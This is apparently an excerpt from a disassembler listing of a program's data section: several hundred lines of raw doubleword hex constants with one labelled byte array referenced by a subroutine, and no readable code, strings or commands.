		dd 6096112Ah, 0C253C2AAh, 2A641B00h, 4B0C4F02h,	0BA279108h
		dd 181013C1h, 148A4149h, 3B9A4614h, 11FC192h, 604B0150h
		dd 27887727h, 89449E70h, 6AAE1210h, 77735634h, 4B10F7FDh
		dd 28064261h, 0B245DCD7h, 9802420h, 941EF170h, 257700C7h
		dd 73434779h, 64773332h, 0AEEA2586h, 0AEF53BA3h, 0EC5AC0C3h
		dd 555810B9h, 2E46B525h, 76F25A82h, 0C6853165h,	98E58DD6h
		dd 16AA16FBh, 85D49829h, 0B080C8E1h, 1A68A4AAh,	7E142397h
		dd 80C8AAD4h, 0E8B5277Bh, 0CBA38FB6h, 1BBFD30h,	215F5F88h
		dd 0C1BCB33Bh, 0DF287574h, 0A12C4B42h, 579B7008h, 0CC529811h
		dd 0B35C974Ah, 0E8010CAEh, 0C0A2D409h, 68BCDC0Dh, 0ADD958ECh
		dd 362748DAh, 0D9646209h, 83C225AEh, 372BA2ECh,	39D32480h
		dd 76D092ECh, 99011AECh, 1E1955B7h, 9E5EB017h, 0ADC5EBE1h
		dd 7B145ECCh, 17B4C5EDh, 0A9D1711Dh, 0BC74361h,	0D0F4018Bh
		dd 0CBA25801h, 96C74591h, 0D1807467h, 1D1B8747h, 58014BCAh
		dd 0E6049767h, 0CCE05FA0h, 350506D3h, 1FF2547h,	3349B9A8h
		dd 0A7CA1A82h, 40E8E116h, 4003826h, 0BDF08FB0h,	706B50Eh
		dd 9E709D56h, 0A9242331h, 91D44D50h, 4991021Ah,	497A3114h
		dd 0CA22354Ch, 18DFCC8Fh, 9CB00BCBh, 9EF61BB9h,	1832B7A8h
		dd 108C3084h, 0CAA125B2h, 1B603403h, 42604Eh, 650D0BA9h
		dd 65C2412h, 0D38501C0h, 0A51E8B54h, 2A6AE423h,	0A2C84E4h
		dd 0C316C1CCh, 0BCFD2FCDh, 0E31E68C2h, 1A29FF82h, 494EAA4Dh
		dd 2585A64Ah, 1045A515h, 3A816968h, 84D252Ch, 38D583C0h
		dd 0AF2B4262h, 0FB5CA570h, 8D25F698h, 28646480h, 664D5E82h
		dd 0D1871525h, 0C06449ABh, 82969B85h, 8E48C188h, 700D2CA5h
		dd 0AC572181h, 7C544E45h, 3E654BB8h, 45BA7018h,	95E2B547h
		dd 0DFDBBC38h, 80E28257h, 4C62BD71h, 0CE4C473Fh, 0E8884AB8h
		dd 135A4581h, 9A14F5C0h, 9820B45Dh, 140C2752h, 0F2428840h
		dd 2CA1C8h, 5D2610D0h, 9683156h, 761BC45Ch, 93900B0h, 0F2B94A0h
		dd 5E32020Dh, 12125A31h, 0B93B57E8h, 54C4D2C9h,	0D653ECBDh
		dd 0FBD3D1CCh, 0A05920F2h, 0F600CFDBh, 0B705C052h, 110AC170h
		dd 3DAB9388h, 5263435h,	0C07C6A40h, 1317609Eh, 1AE67871h
		dd 0C212B890h, 0E86FF19Dh, 0E43BD074h, 692829D4h, 0B277A9C8h
		dd 0B5A78D67h, 8D3184C3h, 115A0798h, 430D27C1h,	0A1EA5984h
		dd 1660C0E3h, 6E380424h, 5591825Eh, 0E1D06EC4h,	10583108h
		dd 0A286D820h, 5585E614h, 40230655h, 884B7221h,	0A40E0025h
		dd 66458910h, 8AD514Bh,	6452DD14h, 0B8624603h, 1B94D2C1h
		dd 38E4BE0h, 10D8A714h,	4EB34E19h, 37D8D852h, 91B9FD58h
		dd 24EEEF55h, 1E1B90BFh, 69B022F5h, 6F13E008h, 9FC2C0E0h
		dd 1371BECFh, 87383831h, 24BDB68Ah, 761F2A4Fh, 0DDAA7A4Ah
		dd 6A329F0Eh, 2AA45C04h, 5E3EE0B1h, 0E8AA1A0Ah,	639D2087h
		dd 0DFEA7DD6h, 0CA3AC882h, 0E7100800h, 211554F8h, 41DC0D3Eh
		dd 1E324AA0h, 0F5E6C19Ch, 0F9CEB4Ah, 6D9D002h, 2F55B7D8h
		dd 8B042778h, 0FA80881Fh, 810A9317h, 0A2E6CA7Bh, 0B8D8C045h
		dd 72A16A01h, 0D975A62h, 0A1A2010Bh, 0D2080C4Fh, 635E3C3Fh
		dd 43A1E6A4h, 805FE38Dh, 0AD108F17h, 7B501D46h,	3B804055h
		dd 15222533h, 1B8BA5B5h, 30663ADAh, 4181C3A3h, 0B808BC0Fh
		dd 0AAB5E376h, 7AB0C1E7h, 0C3DA020Ah, 0B0A00204h, 0CDF73107h
		dd 7116E904h, 3EC3E0E0h, 65DCC8C0h, 4A516006h, 46F54094h
		dd 30A8B08Ah, 320B1E85h, 44A7AD67h, 0C878DA32h,	31E9036h
		dd 0ED570031h, 58BCE9EEh, 60845947h, 82E04A0Eh,	9F5ECD6Eh
		dd 25104EB5h, 6989DCD4h, 14B660D2h, 0E6F53BD6h,	0D919E8AEh
		dd 28279B58h
		dd 8A3C3190h, 941D0566h, 31C5C810h, 808BBD25h, 10452DAEh
		dd 0E6084665h, 183316E2h, 67DA6E74h, 2E94B4E3h,	2127C4C5h
		dd 919628F1h, 6FCE0426h, 8461847h, 0D38382Ch, 4046C927h
		dd 399E508h, 0AF8F6009h, 4F77955h, 39965802h, 0F260EC03h
		dd 1E330D15h, 74F12900h, 1A74ED1Bh, 119B5395h, 538EE1F1h
		dd 121E97E2h, 69ED80FAh, 0DE1759FEh, 14961147h,	0F016F22Ah
		dd 15853989h, 3F9E0284h, 91C50D85h, 8C39ACD9h, 40AC51C2h
		dd 52C25AD1h, 0E0311D86h, 0C97C353h, 915B9A07h,	86883A14h
		dd 0F29A5EE6h, 24AED10Bh, 99183A58h, 9AE0218Bh,	0B85CA69Eh
		dd 198C9D0Dh, 4299F9C7h, 4DB89286h, 30CA8A37h, 62E20A9Bh
		dd 8E651FD9h, 0B91F4304h, 0C2AD9CFBh, 5C1A6FC1h, 8ADA984h
		dd 0D6386576h, 7CC66077h, 297A5CC4h, 9FCD4969h,	43D008D5h
		dd 34152D00h, 497199B4h, 0CCDD5006h, 0E2C90056h, 5454BF85h
		dd 2C4414F8h, 9C70184Bh, 1850ECE9h, 1CDEE628h, 715926E9h
		dd 82C3506h, 17159B25h,	7CB85E2Dh, 5DE3EA54h, 0E0117577h
		dd 95043F05h, 0CFC46405h, 456AC2CAh, 0C6DEBAD8h, 30C12B9h
		dd 105904Ah, 0FF053ACEh, 2245FD4Bh, 3FC65799h, 9EA03456h
		dd 1D88E1DDh, 6E305A11h, 0C4CC5B62h, 50E408A7h,	9713C0C3h
		dd 8F499BDFh, 0F4E79072h, 0BED6BAC0h, 245AF02Ah, 0C492A957h
		dd 2B3D0AA8h, 0C42B53A0h, 39E33DC0h, 72F25DAEh,	8EE165D2h
		dd 0ED9A4AAEh, 61C98E10h, 35AA1BF8h, 90F9178h, 36ABCCC2h
		dd 0B28DD01Ah, 8AA93702h, 0C9C36B42h, 7822F2Fh,	0ABC2017h
		dd 6F881A03h, 0E354AADCh, 383BD89Eh, 4A9498CEh,	986353BCh
		dd 241ACB98h, 6051BD80h, 63E0513Dh, 7D035B18h, 275A3146h
		dd 16036415h, 0AE9B071Bh, 153574Bh, 31851620h, 0AF5C149Ah
		dd 72E338A6h, 0EA8E809Fh, 0D54A313Ah, 82E72E11h, 27626102h
		dd 7408B6EBh, 22EDCCB5h, 5143D497h, 835FA3h, 6EC0F773h
		dd 65CF801Bh, 312FC550h, 0B23449BDh, 0C79FFBE0h, 6D74BDB2h
		dd 9E99CD5Bh, 1746F8C4h, 49D67498h, 29FE4BABh, 5E8E6AF3h
		dd 1AA83F62h, 35BC1C4h,	0B7D8598Ch, 93877D86h, 556E95D3h
		dd 772FF6C7h, 0BD80D3C1h, 0BB99B3BFh, 129C1256h, 92BE4C35h
		dd 1F7DEFE3h, 674DC3F9h, 9A186492h, 0DF2CF4DDh,	30973ADDh
		dd 2BB9A9D8h, 573B588Fh, 0CDDAA551h, 9F662DBCh,	698EA391h
		dd 2781EC38h, 0F7FACEFFh, 0E70BF01Fh, 0A3E474FDh, 5A8D8F95h
		dd 6B3CA49h, 4530B0ADh,	0BC9E7121h, 8DCBBF96h, 0D9653627h
		dd 0D3753AAh, 5CE1565Dh, 0D94B55DAh, 5DC9E160h,	70B2CB96h
		dd 4B43E8B3h, 52ED93C8h, 0D6A2E18Bh, 31C2D1D4h,	4DF1E33Eh
		dd 88349337h, 1FCCF5B0h, 0B35877D2h, 0E1A0B544h, 22DC1D24h
		dd 66116C9Bh, 0C7A9977Ah, 449F6BBCh, 0D84D3670h, 0C8E4E695h
		dd 0AAEC53A9h, 0FCACE56Fh
		db 5Ah
byte_46C901	db 97h,	6Fh, 0E7h	; DATA XREF: sub_4393BC+4o
		dd 3DD82C7Ah, 0C9858F4Bh, 788A13E4h, 6121102Eh,	3E33F5FFh
		dd 0DF643D76h, 0CA8693EFh, 0A3FC9AF9h, 5E2E3C6Bh, 3F9A136Ah
		dd 0C2EB8BEEh, 0EE5F3B74h, 0F275F5A7h, 0E96FF528h, 75471968h
		dd 82E6F57Dh, 9C1C7E33h, 0CDF056E4h, 5AE9475Dh,	42443965h
		dd 0F7C8D428h, 4393BA6Fh, 0B142C4DEh, 76F13815h, 0C13E748h
		dd 0BFD4EB7Ch, 2AB4E633h, 0D082ED94h, 384CDD3Ch, 0DEBD43C4h
		dd 8C606DBDh, 0A5101285h, 281E8D4h, 444DF5BEh, 0E1455121h
		dd 319B2F25h, 3944C4F1h, 6D3FFD55h, 1412DF89h, 0BDFC9454h
		dd 4D8E5A2Dh, 3B516126h, 0B12E3C95h, 45C4CA49h,	0AD3CF518h
		dd 13A54A2Dh, 9E51913Ch, 725A7CE1h, 4684DAF5h, 7198B51Bh
		dd 12CB9CD6h, 5DD4704Bh, 0AC0A5759h, 51D2D379h,	29BCFB76h
		dd 0AB0974A5h, 753F741Dh, 0EA8F89B5h, 0A9C4706Ah, 4026AFBFh
		dd 66F72908h, 910996D2h, 5AA4424Fh, 0E43FB3AAh,	4627921Dh
		dd 0EFDF2920h, 9C2C7EA2h, 7AA4A20Eh, 0A42B26A4h, 0C25BF050h
		dd 33CA4E25h, 0C2DD0E85h, 29409FC9h, 7F4A8CA5h,	2249B924h
		dd 0EB8A5427h, 0B655C4ADh, 29589DFDh, 9E573AA5h, 8277AC7Ah
		dd 0FC5A9689h, 0A8D95DE7h, 8A5C279Bh, 5DEDA3A9h, 7893B9AEh
		dd 0A28A602h, 59207F1Ah, 629884C2h, 2B37942h, 0DE52ECCAh
		dd 64191CBFh, 0E3A0A662h, 4C37D548h, 329A0918h,	0A97BFACAh
		dd 6A1A9886h, 73E765AAh, 0C920CA6Ch, 12A905C6h,	0AEA6E26Eh
		dd 3A3BB992h, 9C09C8E8h, 748E29C8h, 953D5D06h, 0A2A74266h
		dd 7D78EEFAh, 9D89A829h, 9BF0A9E0h, 963AD727h, 8AA7A272h
		dd 0F1541F1Ah, 9F09732Fh, 63BBA9F8h, 9A3DC6CBh,	0ACB0027Fh
		dd 0C7BEBABh, 225825Fh,	17A1AC10h, 972D5FC3h, 42B0627Bh
		dd 273648D2h, 0C209288Fh, 58E46B0Ah, 27A7D7DEh,	0A7685618h
		dd 0A2B79E36h, 0C961C495h, 0D4EE5E35h, 88133961h, 937AB9D3h
		dd 0E93F2A0Fh, 0C2E04878h, 0FB8C3746h, 3DEBF073h, 7AD7DED7h
		dd 0AAF06EDDh, 0EEBFD3CDh, 7D7756F8h, 0BDCB5567h, 0F841B4CAh
		dd 2B1A2E2Dh, 0F6C70AD7h, 4343C208h, 767F118Dh,	0D1E39139h
		dd 0AC2EE263h, 97D3F23h, 0FADDFB72h, 8C9C938Fh,	40BDEAF9h
		dd 532DE6FBh, 93158515h, 0CF4F2990h, 0D6F33896h, 78ED0F6Dh
		dd 429F72F7h, 0DD4E2D32h, 557EB2FFh, 33929524h,	4F67EBADh
		dd 3AD5DBF9h, 75F8BD62h, 8F4AC646h, 6896CEC6h, 7A0BC1AEh
		dd 0E7777CB8h, 3F56F936h, 954A7356h, 28BF76E1h,	30AD406Bh
		dd 3919C948h, 77DFB1ECh, 97C56630h, 0BE07FECFh,	26999488h
		dd 9BAC5A30h, 0F4ADA63Bh, 4F8FFCD9h, 21B2E867h,	6F494FFDh
		dd 6FA3B48Dh, 0AD1C8B00h, 0ABFBD08Eh, 4EF3E6A8h, 494EF4FCh
		dd 0AC22A145h, 2BFC653Fh, 0CA8597C6h, 6D1DAFAAh, 185D1C17h
		dd 9B5AA869h, 47ED93E9h, 5AA1C56Bh, 0DED07F6Ah,	8795E643h
		dd 7E89AA20h, 4B402BFFh, 0C4000741h, 0FE5D278h,	74684D3Ch
		dd 0FC6D47C9h, 845D6B15h, 0DAEC278h, 670FD57Fh,	22439E9Ah
		dd 0C54B9D0Ch, 0DDC5D68Ah, 18C1FE66h, 8D746E05h, 4AD24ED4h
		dd 5940D08Eh, 0A3A700h,	0BB182018h, 69668086h, 165A1AB9h
		dd 0C6941C5Eh, 0A15F160h, 608CAD64h, 0C04001Fh,	29600137h
		dd 40FE4404h, 8219820Ah, 6374053h, 9060888h, 0A68CC1CCh
		dd 592E82F3h, 8630D28h,	966BF4h, 0D8C90942h, 9C0A4BF2h
		dd 3D76458h, 13064AB4h,	146BD9C2h, 57BC1BD5h, 0B70558D8h
		dd 0E4574531h, 5D148579h, 4CF6E2EEh, 0EDD1D7C5h, 0D2D4D9D5h
		dd 0C9CFD0CCh, 0CBCAC8C7h, 0C6C4D3C1h, 0DAD8C3D6h, 0C2505600h
		dd 5DB1B300h, 8FC6085Bh, 40078086h, 0C0A64DB5h,	0A7AB0E4Ch
		dd 168AA7C2h, 8041BAABh, 322B6980h, 864F91ACh, 25D23A5Ah
		dd 397C2B0h, 8E8FAF2Dh,	0FBBDB0A6h, 0A12D0AFBh,	1AE27416h
		dd 0B600219Ch, 1505725Fh, 2767F116h, 5F45AB0Fh,	0BC084032h
		dd 0B7300539h, 0CBF43F15h, 8C281255h, 6CF6BA7Dh, 0B250E826h
		dd 28B8DB80h, 1EA1061Ah, 66F46786h, 67446084h, 67865D1Eh
		dd 82BDFD6Ch, 0D6EA0798h, 2215571Dh, 0F3E651Ah,	80AE753Ah
		dd 143B519Dh, 5F8352FCh, 0A9F5731Ah, 6F3510C6h,	6A8B3031h
		dd 0F22C098Ch, 0FC36A5F0h, 0E702F104h, 489D61Eh, 0C5EA02Eh
		dd 9282FF29h, 966241F9h, 3A988082h, 0BD1E1E91h,	5814028h
		dd 0B4D997D1h, 0C0570840h, 3F2D671Fh, 80986206h, 25302AB6h
		dd 0A3572E8Ah, 4912D316h, 900A01CBh, 18054BACh,	4EE51A11h
		dd 0BBAD3995h, 2B2D9C45h, 5D733477h, 32834FE2h,	6639A0FFh
		dd 546AB49Ah, 0A38C115Ah, 0CD3CD95Ah, 59DA612Ah, 2D104F0Ah
		dd 8244F1A1h, 661C7629h, 2D2555A8h, 1DA0D501h, 17F2B19h
		dd 7E342ECAh, 0B28941BAh, 0AFF23830h, 8BFD41CAh, 0B21B4B9Dh
		dd 0C90DAAD4h, 9A991995h, 2E6646B1h, 50220420h,	20280020h
		dd 0BE52D4EAh, 0A010CD5Eh, 288152B7h, 4FA989A3h, 602C6D39h
		dd 0CAA65708h, 0E12028EAh, 0DE00BA2Bh, 8AA1694Dh, 7540CC98h
		dd 0CE664B2Ah, 9369C159h, 50040184h, 0C0078094h, 14EA0C1h
		dd 0AC6E6AC3h, 1D3660CEh, 98312731h, 0EF0184C9h, 1C9B8304h
		dd 0D840C0CAh, 64D9C806h, 6AC01FCFh, 0B063CBF5h, 4CAE9EDDh
		dd 0F80C347h, 0BB86AC88h, 0BB39D8CCh, 31A2ED40h, 1A59C99h
		dd 657B2980h, 12E77659h, 0C2584403h, 0F1AD756Bh, 0D8C30E25h
		dd 3DD5B64Ah, 0A2BA6D22h, 0BB402B03h, 93BB6AF3h, 0E69430Ch
		dd 0DBA14AA5h, 0BC91FB42h, 170060A9h, 0DBAC25EEh, 671D4E86h
		dd 62CD1912h, 44A35A4h,	0DBACAB31h, 3B539F6h, 0FC1903EAh
		dd 6DBCD5D5h, 63218FD9h, 881D98FEh, 620D9B83h, 1901F188h
		dd 11901D2Ah, 40F2D49Dh, 4D5B4C75h, 1B518934h, 7F3B0687h
		dd 0C5D1125Fh, 232A2DE2h, 820C4A0Ah, 8A0C1696h,	25972314h
		dd 0B2D109BBh, 0A4C02996h, 9BB05ABAh, 910CC28Ah, 0CEE2462Ah
		dd 58920A58h, 2C127D17h, 597331FFh, 29E4EC67h, 98D3546Fh
		dd 18D1DCAh, 9AD13836h,	5592754Ah, 2D36B943h, 751BD819h
		dd 0BAE4687h, 0D8810D51h, 4C072ADAh, 1A503D4h, 51216A65h
		dd 129A469Ch, 1705C93Ch, 5804DB8Ah, 0B8A41A38h,	30BCBF3Eh
		dd 53CAA4F9h, 0F72F5600h, 5843EE74h, 10E88D01h,	0E2C49686h
		dd 0CCC48AF9h, 0F8CBB764h, 0F5C4F572h, 3FD5C2F8h, 59D497DCh
		dd 0F0CA0BAFh, 4B7030BDh, 0E8316EC0h, 0A6C5BB03h, 26E22238h
		dd 17B8BA16h, 0C021F9C6h, 4CAF3A32h, 0A3838A87h, 33060B95h
		dd 416A8287h, 8594C3AFh, 69A52A9Eh, 0FA9DC2F4h,	0A38C2101h
		dd 0B9B1AA39h, 7575A9A2h, 6332CDEAh, 11A82920h,	5518A133h
		dd 9121D08Eh, 0C710A801h, 0C30D210h, 44ACE93Fh,	9A1F7A34h
		dd 0E463D4A0h, 61A9CD28h, 80233AA0h, 0DB1C1FAFh, 2EE87D12h
		dd 7D1F1014h, 4F3868C6h, 0E3AC001h, 27D02A05h, 2A71D617h
		dd 462B6238h, 898C852h,	0A3C84D00h, 87AF1F32h, 0B6A62D91h
		dd 14ADD0EAh, 155025B4h, 94BC01D5h, 52C94h, 0DB45EABAh
		dd 0B952A09h, 9442D429h, 780B022Ah, 0EE1025CAh,	0F21AC073h
		dd 49A8304Ch, 0AB919305h, 0CCAC19A2h, 5A58452Ah, 0B70774B6h
		dd 80D5D066h, 0B2303968h, 4CB6D75Ch, 5C963894h,	3684BCA5h
		dd 2150746Bh, 0EA5F4161h, 8565EB86h, 8C451B00h,	0BD1D4398h
		dd 0D914F244h, 92AB2C0Eh, 0A444FE9Bh, 48FF2562h, 8E14A958h
		dd 6B25B615h, 942B1008h, 0D8C8B164h, 0E89B515Dh, 0DB759426h
		dd 0C5FBADA8h, 37658D25h, 7C7A8FAEh, 869785Ch, 20658820h
		dd 2A54EC43h, 0E6808EF0h
		dd 660A609h, 7802983h, 260F08AEh, 2C38799Fh, 114DB66Ah
		dd 0E0BBAD4Ch, 869A0162h, 2C40125Fh, 47C828E8h,	2F960015h
		dd 311229C0h, 0A35535ADh, 0E8340D55h, 74104B98h, 658D551h
		dd 1160287Ch, 58E1B5B2h, 19CED48h, 0F2C2A85Ch, 5B81BC1Ch
		dd 9D4F3655h, 0C7C42EE8h, 0FEC063FCh, 5162EB48h, 90D8010Fh
		dd 0D24E8591h, 2EA4A1FFh, 633C096h, 29E0554h, 855233DCh
		dd 0B24C0542h, 0A1152AFFh, 0D712BC49h, 0A030C921h, 0E55FF0D1h
		dd 0E9A020D1h, 47A110h,	4239112Ah, 0C50D0262h, 4BFE00A0h
		dd 44D448C7h, 8A0034C2h, 0DE081388h, 8B0A3C1Eh,	388628E8h
		dd 0A598041h, 0D030A410h, 445973ECh, 427D509Fh,	21D0614Eh
		dd 8125E004h, 1F6156A8h, 7024A02Ch, 99F7413Eh, 0EC5B8346h
		dd 20D29E4Bh, 10668C2h,	904134A3h, 0A31A2800h, 0DF00A1B2h
		dd 441440F2h, 0E8083842h, 0AA207814h, 4A203A59h, 2209E441h
		dd 2DA166E4h, 0F388C98Fh, 493723Ah, 6D2209E5h, 302848C4h
		dd 5931C880h, 20D40AB2h, 664C2DEDh, 0D0F8A626h,	83654863h
		dd 4EA63403h, 0F1188A79h, 684B009Fh, 6412CE15h,	51A1CB43h
		dd 262F6013h, 0EC025CC4h, 0FBB897A2h, 684647F1h, 4EC023F7h
		dd 313ECA25h, 18892792h, 80419A15h, 69873288h, 0FCC70A00h
		dd 36B0286Ch, 8C98F5D1h, 2C023DACh, 47EB227Dh, 0C44B609Fh
		dd 7012E623h, 0DC447ED8h, 27DDC4BFh, 89F43226h,	8460AA39h
		dd 0DC47EFE2h, 7DF84A91h, 134F2B09h, 5911EFC2h,	3F31C280h
		dd 0D10B802h, 651931Eh,	0D225B047h, 82499315h, 3289F491h
		dd 2F027DF0h, 4BF88F49h, 11FBC09Fh, 50129645h, 13C9E020h
		dd 0D20AB266h, 5011F98Eh, 14006AE0h, 50DE1931h,	0EC425944h
		dd 7AB88FD7h, 84FAF097h, 113EEA25h, 0E047AF08h,	0FDC44FB2h
		dd 894422A9h, 0E4801065h, 8556F872h, 0E08F8C70h, 0A5D28C85h
		dd 0E68EA365h, 69010846h, 2908C7BDh, 0D1F2036h,	37C023D9h
		dd 4BF8947Fh, 9285112Bh, 4A5914B9h, 897F1290h, 0F290A9A5h
		dd 8E4B8654h, 0AAB586A4h, 3654B800h, 0DEC1E168h, 84CDF228h
		dd 2464505Ch, 9C6432B8h, 115A131Ah, 2B405520h, 33F81035h
		dd 8E0085Bh, 0AAB5E2Ch,	0DA1A4A12h, 0DC0C0FF9h,	842E8304h
		dd 5FE4ECBCh, 0B99F0610h, 4EA3103Dh, 0DB98A7E6h, 0AA6A9F90h
		dd 0C9BA7E7Dh, 6709F919h, 9D27E65Dh, 3FA6B414h,	0F3008F6Eh
		dd 6880E1BDh, 2A551AFEh, 43932A5h, 5921DBD0h, 1927D4Bh
		dd 8773188h, 1EBD545Ah,	23F39754h, 620DCE0Dh, 593CEC27h
		dd 0D6EAC34Eh, 397A3AD5h, 1B99EAEBh, 346E5C6Fh,	0CC41B96Ch
		dd 0C1A79D04h, 0FAD7894Fh, 3188F6E7h, 1AA28455h, 90372A98h
		dd 0F4F14485h, 42D90575h, 2F14E59Dh, 5AE35BA3h,	0A7668DC8h
		dd 5EDD339Bh, 0B6020EB9h, 52AA2C3Bh, 6D02477Ah,	224DE38h
		dd 7B707DC3h, 0C518211Ch, 747804A6h, 919A1394h,	9024A88h
		dd 5DE446AAh, 1932E502h, 0A34869B4h, 6A0FB99Bh,	94C9E010h
		dd 0D14AA9A0h, 0F9B3DD83h, 6DCAAC3h, 1B94CDE0h,	38540AB1h
		dd 17EDAB0h, 41048D3Ah,	3E3440CBh, 0C28B3B14h, 4DA1A430h
		dd 4B82CB0h, 0F928E121h, 2C2AC40Fh, 9784AF85h, 54C8DCA5h
		dd 73C1C2C2h, 55901F29h, 1D042B85h, 5608FC23h, 0D25383F3h
		dd 45D85B23h, 0DBEDDD4Fh, 0CADF7D3Ch, 0E03103D4h, 7F13206Eh
		dd 467C8D81h, 0F9F9F535h, 7E4C3E4h, 9E7213EFh, 0B7CD6965h
		dd 0A5A75C08h, 0D6EB7D19h, 0A1F2AFFBh, 70B9955h, 22373710h
		dd 4A086015h, 2AF968A2h, 0B1C7DCE8h, 9D01F211h,	461CD3CCh
		dd 9D30B7ACh, 0B8B93298h, 501545C6h, 8E2B4E6Dh,	0E18831A1h
		dd 888E3E2Eh, 2CC79A4Dh, 0E2D405B0h, 1350C71Dh,	384EE224h
		dd 0E283F300h, 0E82A53AEh, 4AE242D0h, 88EA6E05h, 957D1E9Ah
		dd 27F6111Eh, 0B027F6FDh, 1EC627F2h, 819A405Eh,	48F1EA47h
		dd 0A1F157ADh, 36CEC514h, 34C57F8Ch, 3034BB11h,	0D552A360h
		dd 52F44894h, 0AF27AD19h, 4112DC47h, 5E286FC1h,	97AE1DBFh
		dd 0E97D17A2h, 1CA44793h, 718C122Fh, 0C9472F08h, 0AF7D11EDh
		dd 422BD17Eh, 5239D845h, 7A8C8F42h, 23E8AE60h, 51E9C22Bh
		dd 0DB647AD0h, 9FCC02AAh, 0FAB84488h, 0
		dd 6000h, 423000h, 5000434Ah, 0
		dd 3A740000h, 259C20C4h, 0A5D31220h, 6B7D4801h,	5F2BF335h
		dd 72B0D6E9h, 0F65A6629h, 0ED90DBACh, 245805CCh, 0E979A922h
		dd 6BF6A152h, 9ADEB859h, 6189B75h, 580510B1h, 0D01CA044h
		dd 62BBCE6Eh, 677F29DEh, 0C02FBD8Ch, 4D664422h,	0C02ED10h
		dd 35762024h, 0AC76EC45h, 9ACFB0D8h, 0DAAD4B2Dh, 6DBA68B4h
		dd 0B8DC76CBh, 2EB7DF70h, 0E2F394BFh, 2836BBDh,	0D1287A62h
		dd 3D2242A1h, 0A5D3B46Ah, 0EA7D934Ah, 52A929B4h, 0B56A42A3h
		dd 0B35AD52Ah, 3ABBBD62h, 0AAA822C0h, 0AF842C08h, 0C284B05Eh
		dd 2821B84h, 90344603h,	2BC94234h, 769B2C18h, 0A1D2390Ah
		dd 73FEBE99h, 2502A660h, 23D0FE2h, 0F074FD80h, 6A664060h
		dd 7FC97DA2h, 8B6EA60h,	0AF509406h, 0C973AC60h,	427153B6h
		dd 52BEF45Eh, 0B4D6A23Eh, 42058275h, 28086903h,	0C4C67518h
		dd 56D4F6ABh, 8B9D02BEh, 7BC14E64h, 637E3EC7h, 0A9DFF942h
		dd 35FF63A2h, 1B10A091h, 181D004Ah, 35A15015h, 0EB40FB31h
		dd 7A713082h, 4CA85AB1h, 60EC3F62h, 42B1775Bh, 0F13E7840h
		dd 80E342h, 1129060Dh, 0F6018610h, 2CACD89Fh, 2503814Ah
		dd 8949180h, 2A50608Ah,	0C9426128h, 0A50CD4A0h,	9D095283h
		dd 30E54A10h, 0A2CC4E85h, 143D0B47h, 830A7901h,	0A24C9628h
		dd 14855114h, 0C2150903h, 869D3A6Ah, 4AA4053Ah,	4D825063h
		dd 3055C315h, 0AD8C2ABBh, 5290967Ch, 4A38315Bh,	0AB3A2570h
		dd 160195C9h, 2C10CC6h,	882CAD3Bh, 11921609h, 52941A76h
		dd 21682C8Ah, 0B48CB3CCh, 0D3B65A43h, 0DCE6E169h, 0E9D1ED41h
		dd 819820BAh, 8B32883Ah, 3E61A1A2h, 881D6865h, 0F43285D1h
		dd 0FE2B18C1h, 802DB7A3h, 0F8F8276Eh, 0B81BD553h, 0A0317517h
		dd 0DF18357Eh, 4154038Bh, 4340453Ah, 4E8CA1B0h,	9BB4932h
		dd 4E8A02E4h, 2AB3FA0h,	0D2C00B8Ch, 0A3ACFA7Fh,	0D0ED4288h
		dd 0C4DB425h, 0C252505Eh, 21DE2010h, 95ADBC24h,	4310EC9h
		dd 8944D368h, 251314B0h, 946192B0h, 61084A68h, 44A32FE7h
		dd 128DCA5Dh, 4A384967h, 28F2A564h, 8FA594F1h, 99544752h
		dd 10B8EBh, 0C4750C4Ch,	25E8C852h, 784B9091h, 0E52EEAA1h
		dd 0A4B7B095h, 12DA4257h, 4B48097Fh, 951A25FFh,	580764CAh
		dd 9F40AB40h, 0A74F7A04h, 102ED388h, 85BE36Ch, 0D031081Ch
		dd 65910A51h, 50848227h, 3D8FEC6Ah, 8F6EC72h, 0C92347B2h
		dd 7A06451Eh, 9785D934h, 5408B8C1h, 0C9566B0Ch,	0C561954Eh
		dd 0ECB7207Ah, 4B85B257h, 6FB78B19h, 38BCD2D3h,	0BBE82AC9h
		dd 0A85F1154h, 0F095603Ch, 82560046h, 958D12Bh,	2550C4ADh
		dd 94E112ACh, 52444A88h, 47122982h, 144AA409h, 31288C25h
		dd 44882094h, 0F2214250h, 0E897A5FCh, 25DF84Bh,	558B12Fh
		dd 10F84BAh, 7709C0E4h,	0D2250004h, 18966B12h, 2257984Bh
		dd 8956212Ch, 0C11584ACh, 5EBC1284h, 7E4B2A16h,	62F4A5CBh
		dd 97F6DB85h, 321C09Fh,	2A7A019Dh, 84D01297h, 5656794Eh
		dd 0B935811h, 91A66052h, 2178CACh, 1732524Ch, 45005CC2h
		dd 0DCA0AC20h, 84654649h, 9068AC18h, 0C8E1065Ch, 1A41C194h
		dd 1A39720h, 8068EE73h,	0C391065Ch, 1A948010h, 61E90206h
		dd 6F002008h, 20607B3Bh, 32E63420h, 3B6FA911h, 30CB4374h
		dd 0C8020437h, 5E44990Dh, 77121862h, 0F8F6A169h, 0DD4E8AA5h
		dd 0DF0BC00h, 90DEDBC4h, 1C37F6BCh, 62C9832Fh, 8BA58008h
		dd 0F0437612h, 8646D032h, 29227300h, 0A4A99721h, 93255C44h
		dd 0F0076F12h, 0E99FB032h, 0ECF77C2Fh, 1B7C8763h, 4244DFD7h
		dd 3C2CC030h, 60C288Ah,	6D700A13h, 0E1F12060h, 76A60C3h
		dd 0A8E6FF92h, 50A2854Eh, 0B910C7E9h, 84403207h, 832AA0D0h
		dd 0C18AABE0h, 9DA56A3Ch, 3324792h, 40475A72h, 0CD28E96Dh
		dd 982A897h, 0ADA58C05h, 274E54E4h, 777858D3h, 0ED12D319h
		dd 0F21E8188h, 9780E9A5h, 2B6120A1h, 859F8D35h,	0AD0055E7h
		dd 4D01A322h, 4D5F3E4h,	1D03FE02h, 351AD943h, 1431A3D0h
		dd 8C907302h, 6D9D8765h, 2743257Fh, 10563410h, 0D42195B9h
		dd 9C860CCFh, 0E1C1635h, 927D22D5h, 0A6033D16h,	8B222248h
		dd 0E6FA2D98h, 4DF920Dh, 78E93299h, 87DBF263h, 1CE1A226h
		dd 0C764CCE7h, 0F6D674E9h, 0D46B1F0Ch, 0DB49E12Bh, 77FB78B9h
		dd 0C6B1DE85h, 0CFAF25F2h, 0E396D4F8h, 68700676h, 3653EBE5h
		dd 1DFCE82Eh, 144FAFCFh, 258FEFF4h, 0DC9D6E06h,	0EAE92982h
		dd 0FA4C393Ch, 1E87B9FFh, 6F067EF0h, 80E46DFCh,	593D33D3h
